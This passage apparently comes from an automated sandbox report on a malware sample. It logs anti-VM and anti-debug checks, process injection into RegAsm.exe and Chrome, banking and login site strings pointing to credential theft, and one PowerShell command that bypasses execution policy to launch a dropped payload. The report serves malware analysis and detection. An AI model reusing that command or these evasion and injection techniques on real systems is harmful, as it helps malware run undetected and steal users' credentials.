                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Queries memory information (via WMI often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMemory allocated: 1810000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMemory allocated: 3500000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMemory allocated: 1870000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Users\user\Desktop\ADFoyxP.exeWindow / User API: threadDelayed 1518Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comWindow / User API: threadDelayed 3411Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWindow / User API: threadDelayed 9786
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2923
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 570
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comAPI coverage: 4.2 %
                  Source: C:\Users\user\Desktop\ADFoyxP.exe TID: 4652Thread sleep time: -142692s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com TID: 7744Thread sleep count: 3411 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com TID: 7744Thread sleep time: -34110s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe TID: 1664Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe TID: 7612Thread sleep time: -12912720851596678s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe TID: 3384Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comThread sleep count: Count: 3411 delay: -10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_003DA087
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_003DA1E2
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,27_2_003CE472
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,27_2_003DA570
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0039C622 FindFirstFileExW,27_2_0039C622
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D66DC FindFirstFileW,FindNextFileW,FindClose,27_2_003D66DC
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D7333 FindFirstFileW,FindClose,27_2_003D7333
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,27_2_003D73D4
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_003CD921
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_003CDC54
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00365FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,27_2_00365FC8
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353090\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353090Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: RegAsm.exe, 0000001E.00000002.2537902143.0000000005B4F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538485789.0000000005B8D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2537902143.0000000005B32000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2100818963.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2049970543.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2517104645.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2466209800.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2049415707.000002428D5D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: chrome.exe, 00000025.00000003.2196541667.000001FD6ABAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848P
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: curcuma.exe, 00000024.00000003.2306939586.000002428F053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: RegAsm.exe, 0000001E.00000002.2522471882.00000000019A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: curcuma.exe, 00000024.00000002.2517104645.000002428D55C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DF4FF BlockInput,27_2_003DF4FF
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0036338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,27_2_0036338B
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00385058 mov eax, dword ptr fs:[00000030h]27_2_00385058
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003C20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,27_2_003C20AA
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00392992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00392992
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00380BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00380BAF
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00380D45 SetUnhandledExceptionFilter,27_2_00380D45
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00380F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00380F91
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70911B5 Sleep,exit,SetUnhandledExceptionFilter,exit,36_2_00007FF7C70911B5
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1FD691D0000 protect: page execute and read and write
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 691D0000
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300000 value starts with: 4D5AJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300064Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13000C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130012CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300190Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13001F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300258Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13002BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300320Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300384Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13003E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130044CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13004B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300514Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300578Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13005DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300640Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13006A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300708Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130076CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13007D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300834Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300898Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13008FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300960Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13009C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300A28Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300A8CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300AF0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300B54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300BB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300C1CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300C80Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300CE4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300D48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300DACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300E10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300E74Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300ED8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300F3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300FA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301004Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301068Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13010CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301130Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301194Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13011F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130125CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13012C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301324Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301388Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13013ECJump to behavior
